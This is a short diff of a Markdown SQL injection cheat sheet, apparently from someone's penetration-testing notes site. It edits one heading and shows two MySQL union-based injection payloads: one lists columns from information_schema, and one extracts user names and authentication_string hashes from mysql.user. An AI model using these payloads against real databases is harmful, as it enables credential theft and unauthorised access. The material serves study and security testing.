garffff-bot/garffff-bot.github.io/content/Web/SQL Injection/MySQL - Union-Based.md

 'union select column_name from information_schema.columns where table_name='user' and table_schema='mysql' -- -
 ```

-View contents of columns of a table in another database:
+View column names of a table in another database:

 ```bash
 'union select concat(User, ':', authentication_string) from mysql.user -- -